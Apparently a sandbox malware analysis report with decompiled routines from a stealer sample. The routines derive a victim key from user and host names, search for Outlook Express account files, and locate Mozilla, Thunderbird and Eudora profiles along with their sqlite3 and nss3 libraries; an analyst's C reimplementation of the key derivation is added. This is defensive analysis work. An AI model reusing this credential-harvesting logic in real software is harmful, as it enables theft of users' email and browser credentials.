	char _v8;
	char _v9;
	char _v10;
	char _v11;
	char _v12;
	char _v13;
	char _v14;
	char _v15;
	char _v16;
	char _v17;
	char _v18;
	char _v19;
	void _v20;
	long _v24;
	int _v28;
	int _v32;
	void* _v36;
	void _v291;
	char _v292;
	void _v547;
	char _v548;
                                                                                                                                                                        				void _v1058;
                                                                                                                                                                        				short _v1060;
                                                                                                                                                                        				void _v1570;
                                                                                                                                                                        				short _v1572;
                                                                                                                                                                        				int _t88;
                                                                                                                                                                        				signed int _t91;
                                                                                                                                                                        				signed int _t92;
                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				signed short* _t110;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        
                                                                                                                                                                        				_t92 = 0;
                                                                                                                                                                        				_v20 = 0xa3;
                                                                                                                                                                        				_v19 = 0x1e;
                                                                                                                                                                        				_v18 = 0xf3;
                                                                                                                                                                        				_v17 = 0x69;
                                                                                                                                                                        				_v16 = 7;
                                                                                                                                                                        				_v15 = 0x62;
                                                                                                                                                                        				_v14 = 0xd9;
                                                                                                                                                                        				_v13 = 0x1f;
                                                                                                                                                                        				_v12 = 0x1e;
                                                                                                                                                                        				_v11 = 0xe9;
                                                                                                                                                                        				_v10 = 0x35;
                                                                                                                                                                        				_v9 = 0x7d;
                                                                                                                                                                        				_v8 = 0x4f;
                                                                                                                                                                        				_v7 = 0xd2;
                                                                                                                                                                        				_v6 = 0x7d;
                                                                                                                                                                        				_v5 = 0x48;
                                                                                                                                                                        				_v292 = 0;
                                                                                                                                                                        				memset( &_v291, 0, 0xff);
                                                                                                                                                                        				_v548 = 0;
                                                                                                                                                                        				memset( &_v547, 0, 0xff);
                                                                                                                                                                        				_v1572 = 0;
                                                                                                                                                                        				memset( &_v1570, 0, 0x1fe);
                                                                                                                                                                        				_v1060 = 0;
                                                                                                                                                                        				memset( &_v1058, 0, 0x1fe);
                                                                                                                                                                        				_v36 = _a4 + 4;
                                                                                                                                                                        				_a4 = 0;
                                                                                                                                                                        				_v24 = 0xff;
                                                                                                                                                                        				GetComputerNameA( &_v292,  &_v24); // executed
                                                                                                                                                                        				_v24 = 0xff;
                                                                                                                                                                        				GetUserNameA( &_v548,  &_v24); // executed
                                                                                                                                                                        				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                                                                                                        				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                                                                                                        				_v32 = strlen( &_v292);
                                                                                                                                                                        				_t88 = strlen( &_v548);
                                                                                                                                                                        				_t113 = _v36;
                                                                                                                                                                        				_v28 = _t88;
                                                                                                                                                                        				memcpy(_t113,  &_v20, 0x10);
                                                                                                                                                                        				_t91 = 0xba0da71d;
                                                                                                                                                                        				if(_v28 > 0) {
                                                                                                                                                                        					_t110 =  &_v1060;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t104 = _a4 & 0x80000003;
                                                                                                                                                                        						if(_t104 < 0) {
                                                                                                                                                                        							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                                                                                                                                        						_t91 = _t91 * 0xbc8f;
                                                                                                                                                                        						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                                                                                                                                        						_a4 = _a4 + 1;
                                                                                                                                                                        						_t110 =  &(_t110[1]);
                                                                                                                                                                        					} while (_a4 < _v28);
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_v32 > _t92) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t99 = _a4 & 0x80000003;
                                                                                                                                                                        						if(_t99 < 0) {
                                                                                                                                                                        							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                                                                                                                                        						_t91 = _t91 * 0xbc8f;
                                                                                                                                                                        						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                                                                                                                                        						_a4 = _a4 + 1;
                                                                                                                                                                        						_t92 = _t92 + 1;
                                                                                                                                                                        					} while (_t92 < _v32);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t91;
                                                                                                                                                                        			}
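The routine above turns a hardcoded 16-byte seed into a per-victim value by XOR-mixing the user name and computer name into it, one UTF-16 unit at a time, with a multiplier that steps by 0xbc8f after every character. The C program below is an added example written for this page, not code from the sample or from Joe Sandbox: it reimplements that derivation so an analyst can reproduce the 16 bytes for a given user/host pair. The function and type names (`derive_host_key`, `host_key_t`, `key_byte_ascii`), the sample names, and the 255-character limit are this example's own; names are assumed to be ASCII, so each UTF-16 unit equals the byte value, which is what `MultiByteToWideChar` yields for 7-bit input.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 16 seed bytes the routine stores at _v20.._v5, in memory order. */
static const uint8_t SEED[16] = {
    0xa3, 0x1e, 0xf3, 0x69, 0x07, 0x62, 0xd9, 0x1f,
    0x1e, 0xe9, 0x35, 0x7d, 0x4f, 0xd2, 0x7d, 0x48
};

#define MULT_INIT 0xba0da71du  /* _t91 start value */
#define MULT_STEP 0xbc8fu      /* 48271 = MINSTD LCG multiplier, applied mod 2^32 */

/* Result type for this example (hypothetical name). The sample writes the 16
   bytes into the caller's buffer at _a4+4 and returns the multiplier in eax. */
typedef struct {
    uint8_t  bytes[16];
    uint32_t final_mult;
} host_key_t;

/* Little-endian dword helpers so the XOR matches what the x86 code does when
   it treats the seed as four 32-bit words. */
static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void store_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Mix one name into the four key words. `i` is the running index the sample
   keeps in _a4; it continues across both names, so the second name starts at
   dword (user_len % 4), not at dword 0. */
static void mix_name(uint32_t words[4], const uint16_t *name, size_t len,
                     uint32_t *mult, size_t *i)
{
    for (size_t k = 0; k < len; k++, (*i)++) {
        uint32_t t = (uint32_t)name[k] * *mult;  /* (*_t110 & 0xffff) * _t91 */
        *mult *= MULT_STEP;                       /* _t91 = _t91 * 0xbc8f     */
        words[*i & 3] ^= t;                       /* _a4 % 4 selects the dword */
    }
}

/* Derive the key from UTF-16 code units: user name first, then computer name. */
host_key_t derive_host_key(const uint16_t *user, size_t user_len,
                           const uint16_t *host, size_t host_len)
{
    host_key_t k;
    uint32_t words[4];
    uint32_t mult = MULT_INIT;
    size_t i = 0;
    for (int w = 0; w < 4; w++) words[w] = load_le32(SEED + 4 * w);
    mix_name(words, user, user_len, &mult, &i);
    mix_name(words, host, host_len, &mult, &i);
    for (int w = 0; w < 4; w++) store_le32(k.bytes + 4 * w, words[w]);
    k.final_mult = mult;
    return k;
}

/* Wrapper for ASCII names: widen each byte to one UTF-16 unit, as
   MultiByteToWideChar does for 7-bit input. The sample's buffers hold 255
   characters, so longer names are truncated the same way here. */
host_key_t derive_host_key_ascii(const char *user, const char *host)
{
    uint16_t u[256], h[256];
    size_t ul = strlen(user), hl = strlen(host);
    if (ul > 255) ul = 255;
    if (hl > 255) hl = 255;
    for (size_t j = 0; j < ul; j++) u[j] = (uint8_t)user[j];
    for (size_t j = 0; j < hl; j++) h[j] = (uint8_t)host[j];
    return derive_host_key(u, ul, h, hl);
}

/* Accessor used for checking individual output bytes. */
uint8_t key_byte_ascii(const char *user, const char *host, int idx)
{
    host_key_t k = derive_host_key_ascii(user, host);
    return k.bytes[idx & 15];
}

int main(void)
{
    /* Constructed sample names, not taken from any real victim. */
    host_key_t k = derive_host_key_ascii("alice", "DESKTOP-01");
    printf("user=alice host=DESKTOP-01 key=");
    for (int j = 0; j < 16; j++) printf("%02x", k.bytes[j]);
    printf(" final_mult=%08x\n", k.final_mult);
    return 0;
}
```

With both names empty the output is the seed itself, which is the quickest check that a reimplementation has the byte order right; a single character 'A' (0x41) changes only the first dword, because 0x41 * 0xba0da71d mod 2^32 is XORed into dword 0 before the multiplier advances.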
Statement addresses from the decompiler listing (one per statement above, in listing order; the function starts at 0x004073c7):
0x004073c7 0x004073d2 0x004073d6 0x004073da 0x004073de 0x004073e2 0x004073e6 0x004073ea 0x004073ee 0x004073f2
0x004073f6 0x004073fa 0x004073fe 0x00407402 0x00407406 0x0040740a 0x0040740e 0x00407412 0x00407418 0x00407426
0x0040742c 0x0040743f 0x00407446 0x00407454 0x0040745b 0x00407466 0x00407477 0x0040747a 0x0040747d 0x0040748e
0x00407491 0x004074b0 0x004074c5 0x004074d3 0x004074dd 0x004074e2 0x004074e5 0x004074ef 0x004074fa 0x004074ff
0x00407501 0x00407507 0x0040750a 0x00407510 0x00407516 0x00407516 0x0040751a 0x0040751d 0x00407526 0x00407528
0x0040752f 0x00407530 0x00407507 0x00407538 0x0040753a 0x0040753d 0x00407543 0x00407549 0x00407549 0x00407552
0x00407555 0x0040755e 0x00407560 0x00407563 0x00407564 0x0040753a 0x0040756d

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
• Instruction ID: c4a028c48163d552ebb965a22663fb4caedd15d38ec5c0ca2e6f283cdba292cd
• Opcode Fuzzy Hash: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
• Instruction Fuzzy Hash: 7A51E771C0025DAEDB11CFA8CC40BEEBBBCEF49314F0442AAE555E6191D3789B85CB65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Graph not reproduced: basic blocks 40702d-4070c4 with calls to FindFirstFileA, FindNextFileA, strlen (x2), 4070c5 and 4062b7; executed / not-executed colouring lost in extraction]
C-Code - Quality: 100%
// Decompiler output as shown in the report (temporaries such as _t1, _t6, _t45 are left
// undeclared by the decompiler). One step of a directory enumeration: the first call
// runs FindFirstFileA on the pattern at _t40[1] and stores the handle at *_t40, later
// calls run FindNextFileA with that handle. On a hit, the name found (_t40[0x5d], the
// cFileName field of the WIN32_FIND_DATAA at _t40[0x52]) is joined to the base path
// (_t40[0xf3]) into _t40[0xa2] by E004062B7, unless the result would reach 0x143 bytes.
E0040702D(void** __eax) {
	void* __esi;
	void* _t15;
	int _t16;
	int _t17;
	void* _t26;
	void** _t38;
	void** _t40;
	void* _t45;

	_t40 = __eax;
	_t15 = *__eax;
	if(_t15 != 0xffffffff) {
		_t6 = &(_t40[0x52]); // 0x247, WIN32_FIND_DATAA
		_t16 = FindNextFileA(_t15, _t6); // executed
		*(_t45 + 4) = _t16;
		if(_t16 != 0) {
			goto L5;
		} else {
			E004070C5(_t40); // enumeration exhausted: clean up
			goto L4;
		}
	} else {
		_t1 = &(_t40[0x52]); // 0x247, WIN32_FIND_DATAA
		_t2 = &(_t40[1]); // 0x103, search pattern
		_t26 = FindFirstFileA(_t2, _t1); // executed
		*_t40 = _t26;
		*(_t45 + 4) = 0 | _t26 != 0xffffffff;
		L4:
		if( *(_t45 + 4) != 0) {
			L5:
			_t9 = &(_t40[0xa2]); // 0x387, destination buffer for the full path
			_t38 = _t9;
			_t10 = &(_t40[0x5d]); // 0x273, cFileName of the find data
			_t28 = _t10;
			_t41 = &(_t40[0xf3]); // base directory
			_t17 = strlen( &(_t40[0xf3]));
			if(strlen(_t10) + _t17 + 1 >= 0x143) {
				*_t38 = 0; // would overflow: leave an empty path
			} else {
				E004062B7(_t38, _t41, _t28); // dest = base dir + file name
			}
		}
	}
	return *(_t45 + 4);
}

APIs
• FindFirstFileA.KERNELBASE(00000103,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407043
• FindNextFileA.KERNELBASE(000000FF,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407061
• strlen.MSVCRT ref: 00407091
• strlen.MSVCRT ref: 00407099
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID:
• API String ID: 379999529-0
• Opcode ID: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
• Instruction ID: ee1fc6f362411e34e0c03f62be7ba86f9bee0943d1b98e177d8d8cef5f5d9398
• Opcode Fuzzy Hash: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
• Instruction Fuzzy Hash: 1E1182728092059FD3149B34D844ADBB7DC9F04325F204A3FF05AD31D0EB38B945876A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 97%
// Decompiler output as shown in the report; the listing is cut off by the page after the
// first if/else. E0040F4CA fills _v540 with a folder path selected by 0x1a (CSIDL_APPDATA
// has that value; that this is a special-folder lookup is an inference, not stated by the
// report). The caller's buffer _a4 then receives that folder joined with "Mozilla\Profiles"
// by E004062B7, or an empty string if the result would not fit in MAX_PATH (0x104) bytes.
E00401E4A(void* __eflags, char* _a4) {
	signed int _v8;
	int _v12;
	void _v275;
	char _v276;
	void _v539;
	char _v540;
	void _v795;
	char _v796;
	void _v1059;
	char _v1060;
	void _v1323;
	char _v1324;
	void _v2347;
	char _v2348;
	void* __edi;
	void* __esi;
	int _t65;
	char* _t69;
	char _t70;
	int _t71;
	char _t75;
	void* _t76;
	long _t78;
	void* _t83;
	int _t85;
	void* _t87;
	int _t104;
	int _t108;
	char _t126;
	void* _t137;
	void* _t139;
	char* _t157;
	char* _t158;
	char* _t160;
	int _t161;
	void* _t164;
	CHAR* _t169;
	char* _t170;
	void* _t171;
	void* _t172;
	void* _t173;
	void* _t174;
	void* _t175;

	_v540 = 0;
	memset( &_v539, 0, 0x104); // zero a MAX_PATH buffer
	_t164 = 0x1a;
	E0040F4CA( &_v540, _t164); // executed; resolves folder 0x1a into _v540
	_t65 = strlen("Mozilla\\Profiles");
	_t6 = strlen( &_v540) + 1; // 0x1
	_t172 = _t171 + 0x14;
	if(_t65 + _t6 >= 0x104) {
		_t69 = _a4;
		*_t69 = 0; // would overflow MAX_PATH: return an empty string
		_t157 = _t69;
	} else {
		_t157 = _a4;
		E004062B7(_t157, &_v540, "Mozilla\\Profiles"); // _a4 = folder + "\Mozilla\Profiles"
	}
                                                                                                                                                                        				_t70 = E00406155(_t157);
                                                                                                                                                                        				if(_t70 == 0) {
                                                                                                                                                                        					 *_t157 = _t70;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t158 = _t157 + 0x105;
                                                                                                                                                                        				_t71 = strlen("Thunderbird\\Profiles");
                                                                                                                                                                        				_t12 = strlen( &_v540) + 1; // 0x1
                                                                                                                                                                        				if(_t71 + _t12 >= 0x104) {
                                                                                                                                                                        					 *_t158 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E004062B7(_t158,  &_v540, "Thunderbird\\Profiles");
                                                                                                                                                                        				}
                                                                                                                                                                        				_t75 = E00406155(_t158);
                                                                                                                                                                        				_pop(_t137);
                                                                                                                                                                        				if(_t75 == 0) {
                                                                                                                                                                        					 *_t158 = _t75;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t160 = _a4 + 0x20a;
                                                                                                                                                                        				_t76 = E00401C56(_t137, _t160, 0x80000001, "Software\\Qualcomm\\Eudora\\CommandLine", "current"); // executed
                                                                                                                                                                        				_t173 = _t172 + 0xc;
                                                                                                                                                                        				if(_t76 == 0) {
                                                                                                                                                                        					_t126 = E00401C56(_t137, _t160, 0x80000002, "Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", 0x41344f); // executed
                                                                                                                                                                        					_t173 = _t173 + 0xc;
                                                                                                                                                                        					if(_t126 == 0) {
                                                                                                                                                                        						 *_t160 = _t126;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t78 = E0040F1B0(0x80000002, "Software\\Mozilla\\Mozilla Thunderbird",  &_v8);
                                                                                                                                                                        				_t174 = _t173 + 0xc;
                                                                                                                                                                        				if(_t78 != 0) {
                                                                                                                                                                        					L32:
                                                                                                                                                                        					_t169 = _a4 + 0x30f;
                                                                                                                                                                        					if( *_t169 != 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						return _t78;
                                                                                                                                                                        					}
                                                                                                                                                                        					ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t169, 0x104);
                                                                                                                                                                        					_t78 = E00406155(_t169);
                                                                                                                                                                        					if(_t78 != 0) {
                                                                                                                                                                        						goto L35;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *_t169 = _t78;
                                                                                                                                                                        					return _t78;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v796 = _t78;
                                                                                                                                                                        					_t161 = 0;
                                                                                                                                                                        					memset( &_v795, 0, 0xff);
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					_t83 = E0040F276(_v8, 0,  &_v796);
                                                                                                                                                                        					_t175 = _t174 + 0x18;
                                                                                                                                                                        					if(_t83 != 0) {
                                                                                                                                                                        						L31:
                                                                                                                                                                        						_t78 = RegCloseKey(_v8);
                                                                                                                                                                        						goto L32;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t170 = "sqlite3.dll";
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t85 = atoi( &_v796);
                                                                                                                                                                        						_pop(_t139);
                                                                                                                                                                        						if(_t85 < 3) {
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v2348 = 0;
                                                                                                                                                                        						memset( &_v2347, _t161, 0x3ff);
                                                                                                                                                                        						_v276 = 0;
                                                                                                                                                                        						memset( &_v275, _t161, 0x104);
                                                                                                                                                                        						sprintf( &_v2348, "%s\\Main",  &_v796);
                                                                                                                                                                        						E0040F232(_t139, _v8,  &_v2348, "Install Directory",  &_v276, 0x104);
                                                                                                                                                                        						_t175 = _t175 + 0x38;
                                                                                                                                                                        						if(_v276 != 0 && E00406155( &_v276) != 0) {
                                                                                                                                                                        							_v1060 = 0;
                                                                                                                                                                        							memset( &_v1059, _t161, 0x104);
                                                                                                                                                                        							_v1324 = 0;
                                                                                                                                                                        							memset( &_v1323, _t161, 0x104);
                                                                                                                                                                        							_t104 = strlen(_t170);
                                                                                                                                                                        							_t41 = strlen( &_v276) + 1; // 0x1
                                                                                                                                                                        							_t175 = _t175 + 0x20;
                                                                                                                                                                        							if(_t104 + _t41 >= 0x104) {
                                                                                                                                                                        								_v1060 = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								E004062B7( &_v1060,  &_v276, _t170);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t108 = strlen("nss3.dll");
                                                                                                                                                                        							_t47 = strlen( &_v276) + 1; // 0x1
                                                                                                                                                                        							if(_t108 + _t47 >= 0x104) {
                                                                                                                                                                        								_v1324 = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								E004062B7( &_v1324,  &_v276, "nss3.dll");
                                                                                                                                                                        							}
                                                                                                                                                                        							if(E00406155( &_v1060) == 0 || E00406155( &_v1324) == 0) {
                                                                                                                                                                        								_t161 = 0;
                                                                                                                                                                        								goto L28;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								strcpy(_a4 + 0x30f,  &_v276);
                                                                                                                                                                        								goto L31;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						L28:
                                                                                                                                                                        						_v12 = _v12 + 1;
                                                                                                                                                                        						_t87 = E0040F276(_v8, _v12,  &_v796);
                                                                                                                                                                        						_t175 = _t175 + 0xc;
                                                                                                                                                                        					} while (_t87 == 0);
                                                                                                                                                                        					goto L31;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
[Instruction address column of the decompiled listing, detached by extraction: 0x00401e65 to 0x00402194]
                                                                                                                                                                        0x00401fa5
                                                                                                                                                                        0x00401faa
                                                                                                                                                                        0x00401faf
                                                                                                                                                                        0x0040215f
                                                                                                                                                                        0x00402162
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402162
                                                                                                                                                                        0x00401fb5
                                                                                                                                                                        0x00401fba
                                                                                                                                                                        0x00401fc1
                                                                                                                                                                        0x00401fc9
                                                                                                                                                                        0x00401fca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401fdd
                                                                                                                                                                        0x00401fe4
                                                                                                                                                                        0x00401ff2
                                                                                                                                                                        0x00401ff9
                                                                                                                                                                        0x00402011
                                                                                                                                                                        0x0040202d
                                                                                                                                                                        0x00402032
                                                                                                                                                                        0x0040203c
                                                                                                                                                                        0x00402060
                                                                                                                                                                        0x00402067
                                                                                                                                                                        0x00402075
                                                                                                                                                                        0x0040207c
                                                                                                                                                                        0x00402082
                                                                                                                                                                        0x00402095
                                                                                                                                                                        0x00402099
                                                                                                                                                                        0x0040209e
                                                                                                                                                                        0x004020b7
                                                                                                                                                                        0x004020a0
                                                                                                                                                                        0x004020ae
                                                                                                                                                                        0x004020b4
                                                                                                                                                                        0x004020c3
                                                                                                                                                                        0x004020d6
                                                                                                                                                                        0x004020de
                                                                                                                                                                        0x004020fb
                                                                                                                                                                        0x004020e0
                                                                                                                                                                        0x004020f2
                                                                                                                                                                        0x004020f8
                                                                                                                                                                        0x00402111
                                                                                                                                                                        0x00402124
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402148
                                                                                                                                                                        0x00402158
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040215e
                                                                                                                                                                        0x00402111
                                                                                                                                                                        0x00402126
                                                                                                                                                                        0x00402126
                                                                                                                                                                        0x00402136
                                                                                                                                                                        0x0040213b
                                                                                                                                                                        0x0040213e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402146

APIs
• memset.MSVCRT ref: 00401E6C
• strlen.MSVCRT ref: 00401E85
• strlen.MSVCRT ref: 00401E93
• strlen.MSVCRT ref: 00401ED9
• strlen.MSVCRT ref: 00401EE7
• memset.MSVCRT ref: 00401F92
• atoi.MSVCRT ref: 00401FC1
• memset.MSVCRT ref: 00401FE4
• sprintf.MSVCRT ref: 00402011
  • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
• memset.MSVCRT ref: 00402067
• memset.MSVCRT ref: 0040207C
• strlen.MSVCRT ref: 00402082
• strlen.MSVCRT ref: 00402090
• strlen.MSVCRT ref: 004020C3
• strlen.MSVCRT ref: 004020D1
• memset.MSVCRT ref: 00401FF9
  • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
  • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
• strcpy.MSVCRT(?,00000000), ref: 00402158
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402162
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040217D
  • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileStringsatoisprintfstrcat
• String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
• API String ID: 2492260235-4223776976
• Opcode ID: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
• Instruction ID: 6d070b6b648a05e91db5632b048882ca6db18ac9797f22d42d855398ddad24fb
• Opcode Fuzzy Hash: 59627f2f584a0fc03280b870890c3a08f891bace1e47a2458c552be32f244d3b
• Instruction Fuzzy Hash: 8B91C772804159AEDB21E6958C45FDB7BAD9F18309F1400BBF608F2182EB789BC58B5D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 85%
			E0040BB8D(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a12) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v304;
				signed int _v308;
				struct HWND__* _v312;
				intOrPtr _v608;
				struct HACCEL__* _v620;
				struct HWND__* _v644;
				char _v900;
				char _v904;
				char _v908;
				struct tagMSG _v936;
				intOrPtr _v940;
				struct HWND__* _v944;
				struct HWND__* _v948;
				char _v956;
				char _v980;
				char _v988;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t49;
				void* _t52;
				int _t56;
				int _t58;
				int _t69;
				void* _t73;
				int _t76;
				int _t78;
				struct HWND__* _t79;
				int _t81;
				int _t86;
				int _t87;
				struct HWND__* _t101;

				_t96 = __ecx;
				 *0x417b94 = _a4;
				_t49 = E00404841(__ecx);
				if(_t49 != 0) {
					E0040F41D();
					_t52 = E00406A5B( &_v980);
					_t101 = 0;
					_v940 = 0x20;
					_v948 = 0;
					_v936.hwnd = 0;
					_v944 = 0;
					_v936.message = 0;
					E0040B91E(_t52,  &_v900); // executed
					_v8 =  &_v980;
					E00406DF1(__eflags,  &_v980, _a12);
					_t56 = E00406F65(_v16, "/savelangfile");
					__eflags = _t56;
					if(_t56 < 0) {
						E004083A7(); // executed
						_t58 = E00406F65(_v8, "/deleteregkey");
						__eflags = _t58;
						if(_t58 < 0) {
							 *0x418110 = 0x11223344; // executed
							EnumResourceTypesA( *0x417b94, E0040F402, 0); // executed
							__eflags =  *0x418110 - 0x4695399a;
                                                                                                                                                                        							if( *0x418110 == 0x4695399a) {
                                                                                                                                                                        								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                        									L13:
                                                                                                                                                                        									__imp__CoInitialize(_t101);
                                                                                                                                                                        									E0040B84C(_t96,  &_v908);
                                                                                                                                                                        									__eflags = _v608 - 3;
                                                                                                                                                                        									if(_v608 != 3) {
                                                                                                                                                                        										_push(5);
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_push(3);
                                                                                                                                                                        									}
                                                                                                                                                                        									ShowWindow(_v644, ??);
                                                                                                                                                                        									UpdateWindow(_v644);
                                                                                                                                                                        									_v620 = LoadAcceleratorsA( *0x417b94, 0x67);
                                                                                                                                                                        									E0040AEB7( &_v908);
                                                                                                                                                                        									_t69 = GetMessageA( &_v936, _t101, _t101, _t101);
                                                                                                                                                                        									__eflags = _t69;
                                                                                                                                                                        									if(_t69 == 0) {
                                                                                                                                                                        										L24:
                                                                                                                                                                        										__imp__CoUninitialize();
                                                                                                                                                                        										goto L25;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										do {
                                                                                                                                                                        											_t76 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                                                                                                                                        											__eflags = _t76;
                                                                                                                                                                        											if(_t76 != 0) {
                                                                                                                                                                        												goto L23;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t79 =  *0x4181ac;
                                                                                                                                                                        											__eflags = _t79 - _t101;
                                                                                                                                                                        											if(_t79 == _t101) {
                                                                                                                                                                        												L21:
                                                                                                                                                                        												_t81 = IsDialogMessageA(_v644,  &_v936);
                                                                                                                                                                        												__eflags = _t81;
                                                                                                                                                                        												if(_t81 == 0) {
                                                                                                                                                                        													TranslateMessage( &_v936);
                                                                                                                                                                        													DispatchMessageA( &_v936);
                                                                                                                                                                        												}
                                                                                                                                                                        												goto L23;
                                                                                                                                                                        											}
                                                                                                                                                                        											_t86 = IsDialogMessageA(_t79,  &_v936);
                                                                                                                                                                        											__eflags = _t86;
                                                                                                                                                                        											if(_t86 != 0) {
                                                                                                                                                                        												goto L23;
                                                                                                                                                                        											}
                                                                                                                                                                        											goto L21;
                                                                                                                                                                        											L23:
                                                                                                                                                                        											_t78 = GetMessageA( &_v936, _t101, _t101, _t101);
                                                                                                                                                                        											__eflags = _t78;
                                                                                                                                                                        										} while (_t78 != 0);
                                                                                                                                                                        										goto L24;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
